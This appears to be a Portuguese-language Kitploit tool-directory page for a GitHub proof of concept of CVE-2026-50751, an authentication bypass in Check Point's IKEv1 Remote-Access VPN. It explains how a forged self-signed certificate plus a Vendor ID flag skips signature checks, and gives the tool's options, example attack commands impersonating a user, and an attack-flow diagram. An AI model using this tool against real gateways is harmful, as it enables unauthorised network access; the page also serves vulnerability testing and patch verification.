Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-50751 — Bypass de autenticação por certificado na VPN Remote-Access da Check Point (IKEv1). | Kitploit
Ferramentas/GitHubGitHub/ull0a/cve-2026-50751
Frameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoSegurança de RedeCriptografiaTestes de PenetraçãoAutenticaçãoRed TeamingFerramenta de Acesso Remoto
GitHubull0a/cve-2026-50751

CVE-2026-50751

Bypass de autenticação por certificado na VPN Remote-Access da Check Point (IKEv1).

12há 7h 43mAinda não revisado
Ver Repositório

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2026-50751 — PoC

Bypass de autenticação por certificado na VPN Remote-Access da Check Point (IKEv1).

Descrição

CVE-2026-50751 é um bypass de autenticação no daemon iked da Check Point, presente nas versões R81.10, R82 e R82.10 sem o hotfix sk185033. A falha permite autenticar-se como qualquer usuário de Remote Access provisionado sem chave privada, sem senha e sem certificado válido.

O iked vulnerável lê um flag do Vendor ID VPNExtFeatures (bit 0x4) e, se estiver ativado, ignora verify_peer_auth / verifyMessagePhase1. Como consequência:

Não se verifica a assinatura do certificado (prova de posse).

Não se verifica a cadeia de confiança.

Apenas se verifica que o subject DN resolva para um usuário provisionado.

Basta forjar um certificado autoassinado cujo CN= coincida com o usuário alvo e enviá-lo com uma assinatura inválida. Se o gateway aceitar a fase 1, ficamos autenticados como esse usuário (a SA ISAKMP é guardada sob o seu DN).

Funciona sobre IKE (UDP 500/4500) e sobre Visitor Mode (TCPT, TCP 443).

Uso

Sintaxe

root@kitploit:~
cve-2026-50751 -host <IP|hostname> -user <username> [opções]

Opções

FlagDescriçãoPadrão
-hostIP ou hostname do gateway (obrigatório)—
-userUsername RA a personificar (obrigatório)—
-portPorta: 500, 4500 (UDP) ou 443 (TCPT)500
-orgOrganização (O=) da ICA. Se omitida, é derivada do cert TLS—
-ouUnidade organizacional (OU=) do usuáriousers
-timeoutTimeout por operação6s
-retriesTentativas de msg11
-vSaída verbosafalse

Exemplos

Ataque básico por UDP/500

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 500 -user victim -v

Visitor Mode TCPT/443

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -port 443 -user victim -v

Forçando a organização em vez de derivá-la

root@kitploit:~
./cve-2026-50751 -host 203.0.113.10 -user victim -org "ACME Corp" -ou vpn -v

Sobre NAT-T (UDP/4500)

root@kitploit:~
sudo ./cve-2026-50751 -host 203.0.113.10 -port 4500 -user victim -v

Fluxo do ataque

root@kitploit:~
Atacante                                             Gateway (iked vulnerável)
   │                                                          │
   │─── msg1: SA (RSA-SIG) + VPNExtFeatures VID (bit 0x4) ───▶│
   │                                                          │  Lê flag 0x4
   │                                                          │  Marca verify_peer_auth = skip
   │◀── msg2: SA aceito ──────────────────────────────────────│
   │                                                          │
   │─── msg3: KE (g^xi) + Ni ────────────────────────────────▶│
   │◀── msg4: KE (g^xr) + Nr ─────────────────────────────────│
   │                                                          │
   │  Deriva SKEYID, SKEYID_e, IV                             │
   │                                                          │
   │─── msg5 (cifrado): ID=DN forjado + CERT autoassinado    │
   │                    + assinatura aleatória ──────────────▶│
   │                                                          │  Ignora verificação
   │                                                          │  de assinatura
   │                                                          │  Resolve DN → usuário
   │◀── msg6 (cifrado): SA estabelecida ──────────────────────│
   │                                                          │
   │  Decifra msg6 com SKEYID_e → prova de autenticação       │

Baixar ferramenta